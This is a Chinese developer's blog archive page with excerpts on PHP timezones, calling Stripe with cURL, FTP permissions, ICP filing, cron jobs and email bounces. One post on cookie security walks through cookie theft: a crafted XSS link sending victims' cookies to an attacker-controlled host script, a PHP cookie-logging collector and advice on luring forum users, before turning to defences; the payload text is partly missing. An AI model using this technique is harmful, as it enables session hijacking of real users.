作者归档:月小升

关于 月小升

正在创业

php时间国际化和本地转换

假如一个网站面临国际人群,那么可能分布在不同的时区,那么最好存入UTC时间在数据库,然后读出来以后,根据人群的位置,进行计算时间(月小升认为输出的还是UTC时间,但是要进行后处理,根据读者的时区用JS 来重新输出时间,就可以实现国际化了) <?php echo ‘<meta charset="UTF-8">’;   date_default_timezone_set("UTC"); $time1 = date("Y-m-d H:i:s"); $times1 = strtotime($time1);   echo time()."<br />";   echo "UTC时间:".$time1." – ".$times1."<br>";   date_default_timezone_set("PRC"); $time1 = date("Y-m-d H:i:s"); $times1 = strtotime($time1); echo "北京时间:".$time1." – ".$times1."<br>"; echo "当前时区:".date_default_timezone_get()."<br>";   … 继续阅读

发表在 PHP | 标签为 , , | 2 条评论

利用CURL直接调用Stripe接口

<?php   function test(){ var_dump($_POST);   $token = $_POST[’stripeToken’]; echo $token;   var_dump($_GET); $url = ‘https://api.stripe.com/v1/charges’; $data = array( "amount"=>’2000′, "currency"=>’usd’, "source"=>$token, "metadata[order_id]"=>’6735′, ); $i = 0; foreach ($data as $k=>$v){ $v = urlencode(stripslashes($v)); if($i==0){ $req .= "{$k}={$v}"; }else{ $req … 继续阅读

发表在 PHP | 标签为 , , | 一条评论

Cookie欺骗及反欺骗 论cookie安全

Cookie文件不能作为代码执行,也不会传送病毒,它为用户所专有并只能由创建它的服务器来读取。 浏览器一般只允许存放300个Cookie, 每个站点最多存放20个Cookie, 每个Cookie的大小限制为4KB, Cookie代表了你的身份,那么安全性就有得考虑了。 1.Cookie欺骗: Cookie记录了用户的帐户ID、密码之类的信息,通常使用MD5方法加密后在网上传递。经过加密处理后的信息即使被网络上一些别有用心的人截获也看不懂。然而,现在存在的问题是,截获Cookie的人不需要知道这些字符串的含义,只要把别人的Cookie向服务器提交,并且能够通过验证,就可以冒充受害人的身份登陆网站,这种行为叫做Cookie欺骗。 别人穿了你的衣服,冒充你去做了新郎 2.Cookie截获 Cookie以纯文本的形式在浏览器和服务器之间传送,很容易被他人非法截获和利用。任何可以截获Web通信的人都可以读取Cookie。  这个就是一些新手,还有一些网站,傻乎乎的把用户的账户和密码,明文在互联网上传送。核心信息都是加密传送的。记住一点,你发出的任何经过浏览器的信息,提交的表单,不仅仅服务器知道,还有网络传送过程的经历的那些路由器 Cookie截获 http://www.XXX.net/tXl/login/login.pl?username=&passwd=&ok.X=28&ok.y=6;
将其中”“更换为:
”“再试,如果执行成功,就开始构造URL:
http://www.XXX.net/tXl/login/login.pl?username=&passwd=&ok.X=28&ok.y=6.
其中http://www.cbifamily.org/cbi.php是用户能够控制的某台主机上的一个脚本。需要注意的是”%2b”为符号”+”的URL编码,因为”+”将被作为空格处理。该URL即可在论坛中发布,诱使别人点击。
 步骤二:编制收集Cookie的PHP脚本,并将其放到用户可以控制的网站上,当不知情者点击了构造的URL后可以执行该PHP代码。该脚本的具体内容如下: <?php  $info=getenv("OUERY_STRING");  if($info){   $fp=fopen("info.tXt","a");   fwrite($fp,!info."\n");  fclose($fp); }  header("Location:http://www.XXX.net"); ?> 将这段代码放到网络里,则能够收集所有人的Cookie。如果一个论坛允许HTML代码或者允许使用Flash标签,就可以利用这些技术收集Cookie的代码放到论坛里,然后给帖子取一个吸引人的主题,写上有趣的内容,很快就可收集到大量的Cookie。在论坛上,有许多人的密码就是被这种方法盗走的。  明白为啥那么多安全团队都会明确指出你的search.php的参数,可以注入javascript脚本是多么的危险啊 废话那么多。只是我好奇 如何防止cookie被伪装,盗取 答案1:不用cookie,用session (session的硬伤是无法做到保持用户一年免输入密码登录) 答案2:用cookie,但是我加密 比如常规情况下我保存一个cookie username setcookie("username",$username); 现在我保存2个 username, token setcookie("username",$username); setcookie("token",$token); $token 是怎么来的 … 继续阅读

发表在 JAVA, PHP, WEB前端 | 标签为 , , | 留下评论

linux服务器FTP 用户无法修改文件权限

默认是不让你修改的 修改ftp.conf <Limit SITE_CHMOD> AllowAll # DenyAll </Limit> 默认DenyAll 改成AllowAll 就好了。 重启ftp服务器 vsftp和lampp的ftp 理论上一样吧 以上配置为lampp自带的 就这么简单linux服务器FTP 用户登陆后 (无论是windows客户端,还是苹果mac的客户端都可以) 修改文件权限为777了。

发表在 Linux | 标签为 , | 留下评论

跨境电商网站ICP备案

跨境电商网站ICP备案确实让从事跨境电商的朋友烦恼不已,尤其是对我们国家互联网信息服务管理办法知之甚少的境外企业,当真头疼不已。跨境电商网站到底要不要进行ICP备案呢?TMO具体问题具体分析,下面就境外网站ICP备案的认知,分别从进口跨境电商和出口跨境电商两个方面来说明跨境电商网站的ICP备案事宜。 一、境外网站ICP备案认知 我们公司的主营业务是为跨境电商企业提供相应的解决方案,所以我们的客户大部分是境外企业,这些跨国公司在中国从事跨境电商业务,做电商就必须要网站,很多客户以前做过电子商务,并不想来中国之后重新租用空间域名做新站,因此还是用的国外的空间做跨境电商,这样就会出现一个问题,那就是备案的问题,大家都知道,在中国做网站上线都是需要备案的,没备案网站是不能上线的,但是用国外的服务器是不是就不要备案呢?或者说境外电子商务网站在中国需要icp备案吗? 这个问题我们需要分几点来回答,境外普通网站备案问题和境外电子商务网站备案问题,如果你的网站只是普通的网站(即非经营性的),就不需要备案,但是也必须保证不违反中国法律,如果你的是境外电子商务网站,那么就必须要备案。 《互联网信息服务管理办法》第四条规定国家对经营性互联网信息服务实行许可制度;对非经营性互联网信息服务实行备案制度。未取得许可或者未履行备案手续的,不得从事互联网信息服务。国外服务器虽然不备案依然可以上线,但是属于非法,中国政府可以随时屏蔽你的空间,如果涉嫌经营性服务,那么一定要有这个icp证,否则,不查则已一查必罚。 注:通过上面的介绍我们也知道,跨境电商网站想要在中国大陆生存和发展就必须进行ICP备案,经过工信部的审核授权,否则基本不可能在中国大陆合法存在,也就更谈不上进驻中国市场,抢占中国电商市场了。跨境电商分为两种情况,我们具体来说说相应的ICP备案。 二、出口跨境电商网站ICP备案 什么是出口跨境电商?站在我们的角度,那就是将我们国家的商品以电子商务的形式销售至境外的国家和地区,出口跨境电商的对象是非中国大陆消费者,所以,只要我们的电商网站能在目标消费者所在国家被正常访问和浏览,那么网站的ICP备案问题就不存在了。 目前国外以及香港、澳门、台湾地区的网站都是不需要进行备案的,所以说,如果我们的跨境电商业务目标消费人群集中在境外,那么我们可以不用进行备案,租用非大陆的空间服务器,将网站托管在境外,至于境内的办事机构只需通过一些措施接入到境外网络,实现对网站的管理即可。所以说,出口跨境电商是不需要纠结于ICP备案的。 三、进口跨境电商网站ICP备案 进口跨境电商网站可以分为两种,一是原本就在境内的电商网站,一是国外的跨境电商网站。境内的跨境电商网站按照一般的经营性网站申请ICP备案即可,境外的网站该如何进行ICP备案呢?根据工信部的说明,国外空间是不可以在中国进行备案的,所以,对于这些境外网站而言,除了改用中国大陆的空间服务器别无他选。也就是说,无论是境内还是境外的网站,只要你想在中国大陆进行电子商务活动就必须将网站托管在中国大陆的服务器上,接受中国政府的监管。 综上所述,做出口跨境电商无需纠结于ICP备案,可以选择境外的空间来运营电商网站。但是从事进口跨境电商,ICP备案是必须要的,无论是境内企业还是境外企业,只要是进入中国大陆从事电商业务,就必须搭建依托大陆空间服务器的网站并进行ICP备案,ICP备案可以在空间服务商处申请,空间服务商会进行相应的协助和代办。

发表在 阅读笔记 | 标签为 , , , | 2 条评论

每日自动读取一次网页脚本Linux

定时执行个小文件,这样就能做很多事儿 vi autocloseorder.sh chmod 755 autocloseorder.sh DATE=`date "+%Y-%m-%d %H:%M:%S"` echo $DATE >> /backup/server/log/auto.log wget -O test.html -q http://xtc.k1d.com.cn/Reflash/index/ 每天夜里3点32 执行一次 32 03 * * * root /backup/backupwebsite/site.sh 两分钟一次 */2 * * * * root /backup/server/autocloseorder.sh

发表在 Linux | 标签为 , , | 3 条评论

php 过滤非中文,数字,字母的特殊字符

搜索引擎吃进数据的时候,是不需要那些奇怪的字符的 $str = "?><?》”\"《喂喂喂,555?,12312。 3》《|“:L}{P+_)In thsdff0?><M<>\"s~!@#$%^&*()+_)(*&dsdffsde~!@#¥%……&*5545445()+——)(*&……%¥#@!~ 电影_后天 230809-peopl.e die我d.(*&^%$#@!!~"; echo match_chinese($str);   function match_chinese($chars,$encoding=’utf8′) { $pattern =($encoding==’utf8′)?’/[\x{4e00}-\x{9fa5}a-zA-Z0-9,,。 ]/u’:'/[\x80-\xFF]/’; preg_match_all($pattern,$chars,$result); $temp =join(”,$result[0]); return $temp; }

发表在 PHP | 标签为 , , | 留下评论

如何做网站少返工

做项目的过程,经常发生返工,早期的UE,也经常被后期推翻,然后从UE返工,设计返工,技术返工,测试返工,数据返工。。。 1. 做那些可维护的设计和代码 拒绝过多的按钮形态,全站只有3种以内的按钮,采用CSS控制。当需要调用按钮的时候,只需要 <a href="" class="button"> 就搞定。 否则,后期网站逐渐扩大,会让你疲惫不堪。 2.找出你的用户群和任务 給自己的访客下定义 1.普通访客 2.二次来访的普通访客 3.登录的会员 4.管理员 仔细考虑他们的不同任务和目标 3.了解自己的网站目标 增加流量,卖家至上,还是买家至上。谁是我的上帝 4.设计,精炼至上 所谓完美,不是没有什么东西可以增加,而是没有什么东西删除 5.管理未来 5.1 整理良好的文件夹结构 5.2 SVN SVN SVN 5.3 良好的命名规则 gl_3.jpg 和 bag_header.jpg 哪个更好 5.4 HTML 和 CSS 命名变量规划,全局的,首页的,列表的 5.5 及早定义浏览器兼容,你准备兼容多少种浏览器,越早成本越低。 … 继续阅读

发表在 程序视点 | 标签为 , | 留下评论

邮件被服务器拒绝发不出去的原因

少量邮件发送无法收到邮件的情况 月小升遇到的情况: 程序群发邮件(很少,一天10封左右,給3个人) 标题每天相同,就会被鉴定为垃圾邮件 后来改了标题,顺利搞定。 一个我们外人不太知道的原因: 有些邮件服务器拒收非固定IP的邮件(反垃圾邮件措施之一) 发邮件出现系统退信的大致原因   如果邮件传输过程中,收到系统退信,请您检查退信的内容,并和下面的几种情况进行比对,查找原因,一般出现退信的大致原因如下: 1、没有找到收件人的地址   退信包含:invalid address (#5.5.0)/User unknown/user is not found/doesn’t have this account   出错原因:对方地址不存在或者电子邮件地址输入错误。   解决方法:请您核实一下对方的地址是否正确再次发送。 2、接收方邮箱已经没有足够的空间来接收新邮件   退信包含:mailbox is full/Quota exceed the hard limit for user/mail box space not enough   出错原因:接收方的邮箱已满,没有足够的空间来接收新的邮件。   解决方法:用其它方式通过对方及时的清理出足够的空间来接收这封邮件。 3、超过了对方邮件服务商规定的一封邮件大小的限制   退信包含:552 … 继续阅读

发表在 程序视点 | 标签为 , , | 留下评论

改写系统alert的弹出浮层的JS

//改写alert window.alert = function(txt) { var borderColor = "#999"; var title = "[月小升博客提示]"; var shield = document.createElement("DIV"); shield.id = "shield"; shield.style.position = "absolute"; shield.style.left = "0px"; shield.style.top = "0px"; shield.style.width = "100%"; shield.style.height = document.body.scrollHeight+"px"; shield.style.background = "#333"; shield.style.textAlign = … 继续阅读

发表在 WEB前端 | 标签为 , | 留下评论